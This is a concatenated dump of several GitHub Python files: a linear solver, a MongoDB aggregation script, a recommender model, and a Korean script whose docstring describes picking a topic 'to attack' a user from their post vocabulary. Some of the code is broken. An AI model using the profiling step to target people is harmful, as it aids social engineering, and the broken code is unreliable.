f0e81d55da28afc1669b6db65341cc6892e0c832 | 7825ee29507b3e0248ab7bab23ba44c70adc1feb | /numerical-methods/lab1/Rotate.py | 66bb7f7b448d714b30179d3d3ff79c88075c03d6 | [] | no_license | kramar42/university | 815bc80dd29c76e3b3ec9ee47e6d32b087759762 | 26faee8fe7df4ffe5982c3439dc3090ed6c6cb56 | refs/heads/master | 2021-01-19T14:06:53.062052 | 2014-10-22T20:09:17 | 2014-10-22T20:09:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 992 | py | # -*- coding: utf-8 -*-
from Sole import Sole
def RotateSolve(_A):
A = _A.clone()
for i in range(A.size - 1):
for j in range(i + 1, A.size):
a1 = A[i][i]
a2 = A[j][i]
div = (a1 ** 2 + a2 ** 2) ** 0.5
c = a1 / div
s = a2 / div
for k in range(i, A.size + 1):
tmp = A[i][k]
A[i][k] = c * A[i][k] + s * A[j][k]
A[j][k] = -s * tmp + c * A[j][k]
x = [0] * A.size
for i in range(A.size - 1, -1, -1):
s = 0
for j in range(i + 1, A.size):
s += A[i][j] * x[j]
s = A[i][A.size] - s
x[i] = s / A[i][i]
x = [0] * A.size
for i in range(A.size - 1, -1, -1):
s = 0
for j in range(i + 1, A.size):
s += A[i][j] * x[j]
s = A[i][A.size] - s
x[i] = s / A[i][i]
return x
if __name__ == '__main__':
Sole.printVector(RotateSolve(Sole(filename='../Data/A2')))
| [
"kramar42@gmail.com"
] | kramar42@gmail.com |
96e5b955a8c7eb02039fa532cc9f3790edc41ec2 | 48a8849cebc1c9d35dc8f2f5b1a91cbb533ee294 | /webot/static/m_r.py | 3b36d79fff2e32c0a545fdc96eada93faf827514 | [] | no_license | varwey/project | d5b3a3a0bfc35abf45004f95305d4b1a916718d7 | b1fe6a3774757aa48d1bbdcc763ec01500472ecf | refs/heads/master | 2021-01-13T01:27:01.142647 | 2014-06-05T11:02:58 | 2014-06-05T11:02:58 | 20,431,623 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | #!/usr/bin/ env python
#coding:utf-8
import pymongo,MySQLdb
from bson.code import Code
import json
from datetime import datetime,timedelta
import time
no = time.time()
#map函数
m = Code("""
function() {
function format(dt) {
Y = dt.getFullYear();
m = (dt.getMonth()+1);
d = dt.getDate();
H = dt.getHours();
M = dt.getMinutes();
var zf = function(x) {
x = x.toString();
return x[1]?x:'0'+x
}
return Y+'-'+zf(m)+'-'+zf(d)+' '00:00:00'
}
key = {
'time': format(this.gtime),
};
val = {'sum':1};
emit(key, val);
}
""")
#reduce函数
r = Code("""
function(key,values) {
var sum=0;
values.forEach(function(x) {
sum += x.sum;
});
return {'sum':sum}
}
""")
def retime(dt):
return time.mktime(time.strptime(str(dt),'%Y-%m-%d %H:%M:%S'))
conn = pymongo.Connection('192.168.3.39',27019)
db = conn.spider
print datetime.now(),'start!'
now = datetime.utcnow().replace(hour=16,minute=0,second=0,microsecond=0)
now = now - timedelta(days=1)
ago = now - timedelta(days=1)
result = db.item.map_reduce(m,r,'myresult',query={'gtime':{'$gte':ago,'$lt':now}})
except:
result = db.item.map_reduce(m,r,'myresult',query={'gtime':{'$gte':ago,'$lt':now}})
a=''
for d in result.find():
a+=(str(d['_id']['time']),d['value']['sum'])
fi = open('/res.csv','w')
d=fi.write(a)
fi.close()
| [
"910317157@qq.com"
] | 910317157@qq.com |
2ece69e64ed5dcc95014f6f9b290dd10aea8ebca | 580265e1d5593e8015dec26dadb99fe1f0ec7682 | /source/total/personal_topic.py | a34b8af6b8bd6de4789084773f3094e051493e8f | [] | no_license | protection2453/SPST_S | 3756282a8ceb22a3a14e5863c7261529e0741538 | b9246cc950ff66e3908b2d537f6a70f32006413a | refs/heads/master | 2020-09-10T02:35:14.456051 | 2019-11-19T17:46:45 | 2019-11-19T17:46:45 | 221,627,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,081 | py | """ 파일 순서 - 3 -
주요 활동 시간을 정했다면 다음에 필요한 것은 해당 유저가 관심있어하는
관심사를 가지고 공격할 주제를 만드는 것입니다.
관심사는 글의 특정 단어 빈도수로 측정합니다."""
from personal_data import *
import numpy as np
import re
from soynlp.tokenizer import MaxScoreTokenizer
boundmorpheme = ["은", "는", "이", "가", "을", "를", "로써", "에서", "에게서", "부터", "까지", "에게", "한테", "께", "와", "과", "의", "로서", "으로서", "로", "으로"] # 조사
exceptions = boundmorpheme
scores = {'티켓이': 0.3, '티켓': 0.7, '좋아요': 0.2, '좋아':0.5}
tokenizer = MaxScoreTokenizer(scores=scores)
def isHangul(text):
#Check the Python Version
pyVer3 = sys.version_info >= (3, 0)
if pyVer3 : # for Ver 3 or later
encText = text
else: # for Ver 2.x
if type(text) is not unicode:
encText = text.decode('utf-8')
else:
encText = text
hanCount = len(re.findall(u'[\u3130-\u318F\uAC00-\uD7A3]+', encText))
return hanCount > 0
iH = 0
def bringdata(lenarr2):
#데이터 가져오기
data = ""
for x in range(lenarr2):
data += arr2[x]
iH = isHangul(data)
pprint(iH)
return data
def datapaser(data):
#데이터 정제
parse = re.sub("[^0-9a-zA-Z\\s]+[^ ㄱ - ㅣ 가-힣]", "", data)
parse = parse.lower().split()
for x in range(len(parse)):
parse[x] = re.sub("[^ ㄱ - ㅣ 가-힣]+","",parse[x])
try:
ay = tokenizer.tokenize(parse[x])
if(ay == boundmorpheme):
pasrs[x] = ""
else:
parse[x] = ay
except:
parse[x] = re.sub("[^ ㄱ - ㅣ 가-힣]+","",parse[x])
parses = []
for x in range(len(parse)):
try:
parses.append(parse[x][0])
except:
continue
return parses
def express(parses):
#표현
counts = Counter(parses)
counts = counts.most_common()
length = len(counts)
newcount = []
for i in range(length):
if counts[i][0] not in exceptions:
newcount.append(counts[i])
counts_to_frame = pd.DataFrame(counts, columns = ["Word", "Counts"])
countsum1 = sum(counts_to_frame["Counts"])
per1 = [(counts_to_frame["Counts"][i]/countsum1) * 100 \
for i in range(len(counts_to_frame))]
counts_to_frame["Per"] = np.array(per1)
new_to_frame = pd.DataFrame(newcount, columns = ["Word", "Counts"])
countsum2 = sum(new_to_frame["Counts"])
per2 = [(new_to_frame["Counts"][i]/countsum2) * 100 \
for i in range(len(new_to_frame))]
new_to_frame["Per"] = np.array(per2)
fword = [newcount[i][0] for i in range(len(newcount))][:30]
fnumber = [newcount[i][1] for i in range(len(newcount))][:30]
return fword,fnumber
if iH:
reduceword = ['뉴콘','첫공','총막','피켓팅']
for x in reduceword:
if(fword[0] == x):
pointword = '콘서트'
else:
pointword = fword[0]
pointlist.append(pointword)
pointlist.append(fnumber[0])
else:
pointlist.append("한글 아님")
pointlist.append("None")
fword.append("None")
fxs = [i for i, _ in enumerate(fword)]
return pointlist
| [
"protection2453@gmail.com"
] | protection2453@gmail.com |
4163fd0a176f0f939577d0ef9995fd91af470c0c | e2e3982c626b49d57c51b5abafc0a0eb20915e6a | /neural-cf/test_ncf.py | 7ee5449afbd74f37a02ebe169a78d3198753c011 | [] | no_license | mindis/thesis | ee683869627e54b620c8582c8365205e0b5fd424 | 3676aa32be4f115ea0c79448ee6391d3386d496d | refs/heads/master | 2022-04-25T22:55:51.846029 | 2020-04-27T18:39:11 | 2020-04-27T18:39:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,521 | py | import logging
import pandas as pd
import numpy as np
import random
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
import pandas as pd
import math
import heapq
from tqdm import tqdm
def load_dataset(df):
"""
Loads dataset into a pandas dataframe
and transforms it into the format we need.
We then split it into a training and a test set.
"""
# Add column names
#df = df.drop(columns = 'Unnamed: 0', axis=1)
df.columns = ['user', 'item', 'rating']
# Drop any rows with empty cells or rows
# with a play count of zero.
df = df.dropna()
df = df.loc[df.rating != 0]
# Remove any users with fewer than 1 interaction.
df_count = df.groupby(['user']).count()
df['count'] = df.groupby('user')['user'].transform('count')
df = df[df['count'] > 1]
# Convert artists names into numerical IDs
df['user_id'] = df['user'].astype("category").cat.codes
df['item_id'] = df['item'].astype("category").cat.codes
# Create a lookup frame so we can get the artist
# names back in readable form later.
item_lookup = df[['item_id', 'item']].drop_duplicates()
item_lookup['item_id'] = item_lookup.item_id.astype(str)
print(item_lookup)
df.to_csv('/home/nick/Desktop/thesis/datasets/pharmacy-data/ratings-data/user-product.csv')
# Grab the columns we need in the order we need them.
df = df[['user_id', 'item_id', 'rating']]
# Create training and test sets.
df_train, df_test = train_test_split(df)
print(df_train,df_test)
# Create lists of all unique users and artists
users = list(np.sort(df.user_id.unique()))
items = list(np.sort(df.item_id.unique()))
# Get the rows, columns and values for our matrix.
rows = df_train.user_id.astype(int)
cols = df_train.item_id.astype(int)
values = list(df_train.rating)
# Get all user ids and item ids.
uids = np.array(rows.tolist())
iids = np.array(cols.tolist())
# Sample 100 negative interactions for each user in our test data
df_neg = get_negatives(uids, iids, items, df_test)
return uids, iids, df_train, df_test, df_neg, users, items, item_lookup
def get_negatives(uids, iids, items, df_test):
"""Returns a pandas dataframe of N negative interactions
based for each user in df_test.
Args:
uids (np.array): Numpy array of all user ids.
iids (np.array): Numpy array of all item ids.
items (list): List of all unique items.
df_test (dataframe): Our test set.
Returns:
df_neg (dataframe): dataframe with N negative items
for each (u, i) pair in df_test.
"""
negativeList = []
test_u = df_test['user_id'].values.tolist()
test_i = df_test['item_id'].values.tolist()
test_ratings = list(zip(test_u, test_i))
zipped = set(zip(uids, iids))
for (u, i) in test_ratings:
negatives = []
negatives.append((u, i))
for t in range(100):
j = np.random.randint(len(items)) # Get random item id.
while (u, j) in zipped: # Check if there is an interaction
j = np.random.randint(len(items)) # If yes, generate a new item id
negatives.append(j) # Once a negative interaction is found we add it.
negativeList.append(negatives)
df_neg = pd.DataFrame(negativeList)
return df_neg
def mask_first(x):
"""
Return a list of 0 for the first item and 1 for all others
"""
result = np.ones_like(x)
result[0] = 0
return result
def train_test_split(df):
"""
Splits our original data into one test and one
training set.
The test set is made up of one item for each user. This is
our holdout item used to compute Top@K later.
The training set is the same as our original data but
without any of the holdout items.
Args:
df (dataframe): Our original data
Returns:
df_train (dataframe): All of our data except holdout items
df_test (dataframe): Only our holdout items.
"""
# Create two copies of our dataframe that we can modify
df_test = df.copy(deep=True)
df_train = df.copy(deep=True)
# Group by user_id and select only the first item for
# each user (our holdout).
df_test = df_test.groupby(['user_id']).first()
df_test['user_id'] = df_test.index
df_test = df_test[['user_id', 'item_id', 'rating']]
# del df_test.index.name
# Remove the same items as we for our test set in our training set.
mask = df.groupby(['user_id'])['user_id'].transform(mask_first).astype(bool)
df_train = df.loc[mask]
return df_train, df_test
def get_train_instances():
"""Samples a number of negative user-item interactions for each
user-item pair in our testing data.
Returns:
user_input (list): A list of all users for each item
item_input (list): A list of all items for every user,
both positive and negative interactions.
labels (list): A list of all labels. 0 or 1.
"""
user_input, item_input, labels = [], [], []
zipped = set(zip(uids, iids))
for (u, i) in zip(uids, iids):
# Add our positive interaction
user_input.append(u)
item_input.append(i)
labels.append(1)
# Sample a number of random negative interactions
for t in range(num_neg):
j = np.random.randint(len(items))
while (u, j) in zipped:
j = np.random.randint(len(items))
user_input.append(u)
item_input.append(j)
labels.append(0)
return user_input, item_input, labels
def random_mini_batches(U, I, L, mini_batch_size=256):
"""Returns a list of shuffeled mini batched of a given size.
Args:
U (list): All users for every interaction
I (list): All items for every interaction
L (list): All labels for every interaction.
Returns:
mini_batches (list): A list of minibatches containing sets
of batch users, batch items and batch labels
[(u, i, l), (u, i, l) ...]
"""
mini_batches = []
shuffled_U = random.sample(U,len(U))
shuffled_I = random.sample(I,len(I))
shuffled_L = random.sample(L,len(L))
#print(shuffled_U,shuffled_I,shuffled_U)
num_complete_batches = int(math.floor(len(U) / mini_batch_size))
for k in range(0, num_complete_batches):
mini_batch_U = shuffled_U[k * mini_batch_size: k * mini_batch_size + mini_batch_size]
mini_batch_I = shuffled_I[k * mini_batch_size: k * mini_batch_size + mini_batch_size]
mini_batch_L = shuffled_L[k * mini_batch_size: k * mini_batch_size + mini_batch_size]
mini_batch = (mini_batch_U, mini_batch_I, mini_batch_L)
mini_batches.append(mini_batch)
if len(U) % mini_batch_size != 0:
mini_batch_U = shuffled_U[num_complete_batches * mini_batch_size: len(U)]
mini_batch_I = shuffled_I[num_complete_batches * mini_batch_size: len(U)]
mini_batch_L = shuffled_L[num_complete_batches * mini_batch_size: len(U)]
mini_batch = (mini_batch_U, mini_batch_I, mini_batch_L)
mini_batches.append(mini_batch)
return mini_batches
def get_hits(k_ranked, holdout):
"""Return 1 if an item exists in a given list and 0 if not. """
for item in k_ranked:
if item == holdout:
return 1
return 0
def eval_rating(idx, test_ratings, test_negatives, K):
"""Generate ratings for the users in our test set and
check if our holdout item is among the top K highest scores.
Args:
idx (int): Current index
test_ratings (list): Our test set user-item pairs
test_negatives (list): 100 negative items for each
user in our test set.
K (int): number of top recommendations
Returns:
hr (list): A list of 1 if the holdout appeared in our
top K predicted items. 0 if not.
"""
map_item_score = {}
# Get the negative interactions our user.
items = test_negatives[idx]
# Get the user idx.
user_idx = test_ratings[idx][0]
# Get the item idx, i.e. our holdout item.
holdout = test_ratings[idx][1]
# Add the holdout to the end of the negative interactions list.
items.append(holdout)
# Prepare our user and item arrays for tensorflow.
predict_user = np.full(len(items), user_idx, dtype='int32').reshape(-1, 1)
np_items = np.array(items).reshape(-1, 1)
# Feed user and items into the TF graph .
predictions = session.run([output_layer], feed_dict={user: predict_user, item: np_items})
# Get the predicted scores as a list
predictions = predictions[0].flatten().tolist()
# Map predicted score to item id.
for i in range(len(items)):
current_item = items[i]
map_item_score[current_item] = predictions[i]
# Get the K highest ranked items as a list
k_ranked = heapq.nlargest(K, map_item_score, key=map_item_score.get)
# Get a list of hit or no hit.
hits = get_hits(k_ranked, holdout)
return hits,k_ranked
def evaluate(df_neg, K=10):
"""Calculate the top@K hit ratio for our recommendations.
Args:
df_neg (dataframe): dataframe containing our holdout items
and 100 randomly sampled negative interactions for each
(user, item) holdout pair.
K (int): The 'K' number of ranked predictions we want
our holdout item to be present in.
Returns:
hits (list): list of "hits". 1 if the holdout was present in
the K highest ranked predictions. 0 if not.
"""
hits = []
test_u = df_test['user_id'].values.tolist()
test_i = df_test['item_id'].values.tolist()
test_ratings = list(zip(test_u, test_i))
print(test_ratings)
print(type(test_ratings))
#test_ratings[idx][1]
#initialize a dataframe for Top-N products for each user
topN_df = pd.DataFrame(columns=np.arange(len(test_ratings)))
df_neg = df_neg.drop(df_neg.columns[0], axis=1)
test_negatives = df_neg.values.tolist()
for idx in range(len(test_ratings)):
# For each idx, call eval_one_rating
hitrate, topk_ranked = eval_rating(idx, test_ratings, test_negatives, K)
topN_df[idx] = topk_ranked
hits.append(hitrate)
return hits,topN_df
if __name__ == '__main__':
data = pd.read_csv('/home/nick/Desktop/thesis/datasets/pharmacy-data/ratings-data/user_product_ratings.csv')
uids, iids, df_train, df_test, df_neg, users, items, item_lookup = load_dataset(data)
root = logging.getLogger()
if root.handlers:
root.handlers = []
logging.basicConfig(format='%(asctime)s : %(message)s',
filename='neural_cf.log',
level=logging.INFO)
logging.info('Start....')
# -------------
# HYPERPARAMS
# -------------
num_neg = 4
latent_features = 8
epochs = 20
batch_size = 256
learning_rate = 0.001
logging.info('num_neg: {0},latent_features: {1},epochs: {2},'
'batch_size: {3},learning_rate: {4}'.format(num_neg,latent_features,epochs,batch_size,learning_rate))
# -------------------------
# TENSORFLOW GRAPH
# -------------------------
train = True
graph = tf.Graph()
with graph.as_default():
# Define input placeholders for user, item and label.
user = tf.placeholder(tf.int32, shape=(None, 1))
item = tf.placeholder(tf.int32, shape=(None, 1))
label = tf.placeholder(tf.int32, shape=(None, 1))
# User embedding for MLP
mlp_u_var = tf.Variable(tf.random_normal([len(users), 32], stddev=0.05),
name='mlp_user_embedding')
mlp_user_embedding = tf.nn.embedding_lookup(mlp_u_var, user)
# Item embedding for MLP
mlp_i_var = tf.Variable(tf.random_normal([len(items), 32], stddev=0.05),
name='mlp_item_embedding')
mlp_item_embedding = tf.nn.embedding_lookup(mlp_i_var, item)
# User embedding for GMF
gmf_u_var = tf.Variable(tf.random_normal([len(users), latent_features],
stddev=0.05), name='gmf_user_embedding')
gmf_user_embedding = tf.nn.embedding_lookup(gmf_u_var, user)
# Item embedding for GMF
gmf_i_var = tf.Variable(tf.random_normal([len(items), latent_features],
stddev=0.05), name='gmf_item_embedding')
gmf_item_embedding = tf.nn.embedding_lookup(gmf_i_var, item)
# Our GMF layers
gmf_user_embed = tf.keras.layers.Flatten()(gmf_user_embedding)
gmf_item_embed = tf.keras.layers.Flatten()(gmf_item_embedding)
gmf_matrix = tf.multiply(gmf_user_embed, gmf_item_embed)
# Our MLP layers
mlp_user_embed = tf.keras.layers.Flatten()(mlp_user_embedding)
mlp_item_embed = tf.keras.layers.Flatten()(mlp_item_embedding)
mlp_concat = tf.keras.layers.concatenate([mlp_user_embed, mlp_item_embed])
mlp_dropout = tf.keras.layers.Dropout(0.2)(mlp_concat)
mlp_layer_1 = tf.keras.layers.Dense(64, activation='relu', name='layer1')(mlp_dropout)
mlp_batch_norm1 = tf.keras.layers.BatchNormalization(name='batch_norm1')(mlp_layer_1)
mlp_dropout1 = tf.keras.layers.Dropout(0.2, name='dropout1')(mlp_batch_norm1)
mlp_layer_2 = tf.keras.layers.Dense(32, activation='relu', name='layer2')(mlp_dropout1)
mlp_batch_norm2 = tf.keras.layers.BatchNormalization(name='batch_norm1')(mlp_layer_2)
mlp_dropout2 = tf.keras.layers.Dropout(0.2, name='dropout1')(mlp_batch_norm2)
mlp_layer_3 = tf.keras.layers.Dense(16, activation='relu', name='layer3')(mlp_dropout2)
mlp_layer_4 = tf.keras.layers.Dense(8, activation='relu', name='layer4')(mlp_layer_3)
# We merge the two networks together
merged_vector = tf.keras.layers.concatenate([gmf_matrix, mlp_layer_4])
# Our final single neuron output layer.
output_layer = tf.keras.layers.Dense(1,kernel_initializer="lecun_uniform",name='output_layer')(merged_vector)
# Our loss function as a binary cross entropy.
loss = tf.losses.sigmoid_cross_entropy(label, output_layer)
# Train using the Adam optimizer to minimize our loss.
opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
step = opt.minimize(loss)
# Initialize all tensorflow variables.
init = tf.global_variables_initializer()
saver = tf.train.Saver(tf.global_variables(), max_to_keep=10)
session = tf.Session(config=None, graph=graph)
session.run(init)
if train is True:
for epoch in range(epochs):
# Get our training input.
user_input, item_input, labels = get_train_instances()
# Generate a list of minibatches.
#print(user_input,item_input,labels)
minibatches = random_mini_batches(user_input, item_input, labels)
# This has nothing to do with tensorflow but gives
# us a nice progress bar for the training
progress = tqdm(total=len(minibatches))
# Loop over each batch and feed our users, items and labels
# into our graph.
for minibatch in minibatches:
feed_dict = {user: np.array(minibatch[0]).reshape(-1, 1),
item: np.array(minibatch[1]).reshape(-1, 1),
label: np.array(minibatch[2]).reshape(-1, 1)}
# Execute the graph.
_, l = session.run([step, loss], feed_dict)
# Update the progress
progress.update(1)
progress.set_description('Epoch: %d - Loss: %.3f' % (epoch + 1, l))
progress.close()
logging.info('Epoch:{0} - Loss: {1}'.format(epoch+1, l))
saver.save(session,'./checkpoints/ncf-model',global_step=epoch)
else:
test_epoch = 3
ckpt = tf.train.get_checkpoint_state('./checkpoints')
if ckpt and ckpt.model_checkpoint_path:
saver.restore(session, './checkpoints/ncf-model-{}'.format(test_epoch))
# Calculate top@K
hits,topK_products = evaluate(df_neg)
print('\nTop-K product preferences for each user:\n{}'.format(topK_products))
print('\n Hit-Ratio(HR):{}'.format(np.array(hits).mean())) | [
"nick_gianno@hotmail.com"
] | nick_gianno@hotmail.com |
9fcbebcf0c1246df1c7c00e33c87e6b46afce5be | f68425cbf0bdd1e73ff4be34e5068a9375a21808 | /vv/bin/flask | ed72d50e73fae65bef80f10836c8b6ca35f4f714 | [] | no_license | Software-Engineer-Project2/MIMI-Pet-Wars | 2ca8e7fbac110428e1c6e018d0e708b2e26acdb5 | efb2d33245e34d439a6823440b559ec95e2e509c | refs/heads/master | 2021-02-27T18:47:29.474439 | 2020-06-06T17:55:16 | 2020-06-06T17:55:16 | 245,627,419 | 1 | 0 | null | 2020-03-08T15:50:52 | 2020-03-07T12:18:44 | Python | UTF-8 | Python | false | false | 245 | #!/Users/ivyu/Documents/MIMI-Pet-Wars/vv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jie.yu@ucdconnect.ie"
] | jie.yu@ucdconnect.ie |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.